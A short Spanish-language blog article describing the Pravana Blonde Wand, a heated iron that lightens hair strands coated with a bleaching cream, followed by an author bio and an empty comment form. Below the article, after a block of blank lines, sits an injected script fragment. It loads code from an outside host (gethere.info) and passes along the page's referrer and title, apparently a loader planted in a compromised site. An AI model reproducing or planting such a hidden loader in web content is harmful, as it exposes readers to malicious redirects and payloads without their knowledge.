La plancha que te aclara el cabello en segundos

Este gadet de la belleza se ha convertido en toda una sensación en las redes sociales. ¿Te atreverías a probarla?

Probablemente ya hayas escuchado o visto el nuevo gadget que esta revolucionando al mundo de la belleza, se trata de la Pravana Blonde Wand.

Una plancha que en 10 segundos te aclara el cabello y según se informa en redes sociales, ha sido creada con el objetivo de reducir el daño ocasionado por lo químicos que tienen los tintes.

La plancha trabaja con calor sobre mechones de pelo previamente tratados con una crema aclaradora, que se incluye en la caja.

Los mechones cubiertos por la crema se tapan con papel estaño, se desliza la plancha y en cuestión de segundos, el cabello se aclara.

Nikki Lee, dueña de una famosa estética en Los Ángeles, California, y además estilista de algunas estrellas de Hollywood, lanzó este producto que podría facilitar la vida de muchas mujeres.

La estilista asegura que con la plancha podrás realizar todo tipo de mechas y sobre todo disminuyes el tiempo de decoloración y el maltrato capilar.

Por el momento el producto sólo se vende en Estados Unidos, pero se espera que unos meses este a la venta en otros países.

 

 

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

360

Arian Esquivel, promotor y gestor creativo. Creador. ciclista y lector.

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado